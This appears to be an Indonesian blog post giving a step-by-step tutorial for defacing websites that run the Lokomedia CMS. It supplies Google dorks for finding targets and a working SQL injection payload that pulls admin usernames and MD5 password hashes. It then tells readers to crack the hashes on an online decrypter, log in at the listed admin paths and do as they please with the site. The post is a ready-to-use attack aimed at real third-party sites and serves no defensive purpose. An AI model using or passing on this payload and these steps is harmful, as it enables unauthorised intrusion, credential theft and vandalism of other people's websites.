Langsung aja Deface Menggunakan SQL Injection CMS lokomedia
Dork : - inurl:kategori-23-hiburan.html
- inurl:hal-tentang-kami.html
- inurl:statis-1-pengantar.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html
kalian kembangin dork nya lagi, supaya dapat yang vuln/bisa di deface
Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
1. Copy salah satu dork di atas, dan paste di Search Engine (Google)
2. Pilih salah satu target lalu masukin Exploit nya
seperti ini : target.com/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+hiburan.html
(vuln biasanya di title nampak admin sama kode" gitu)
3. tekan CTRL+U untuk melihan lebih jelas nya tuh username sama pass
Nah itu yang gue tandain
Username : admin
Pass : ee26a843418007e717fff651377da82c
karena pass masih dalam bentuk MD5 maka harus di decrypt (terjemah)
4. open HashKiller > https://hashkiller.co.uk/md5-decrypter.aspx < dan masukan kode" tersebut
Nah setelah terlihat pass tersebut langsung saja go to admin login gaes
biasanya admin login terletak di :
- www.target.com/admin
- www.target.com/adminweb
- www.target.com/administrator
- www.target.com/redaktur
- www.target.com/admin
- www.target.com/adminweb
- www.target.com/administrator
- www.target.com/redaktur
Nah setelah login maka bebas mau kalian apakan
dah ah gue mau bobo ganteng dulu :3
Mudah kan pake sql lokomedia?
pesan dari gue, not found bkn berati akhir bro jadi pantang menyerah aja
Oh iya bila ada kesalahan silahkan di benarkan di kolom komentar kak
yang mau ngasih saran langsung koment aja gaes :*
gue sekedar share tutorial yang niatan untuk membantu newbie kek gue :'D
Sekian dan semoga bermanfaat.. thanks para pembaca
./Thoriqul
Cuma segitu caranya min?
BalasHapus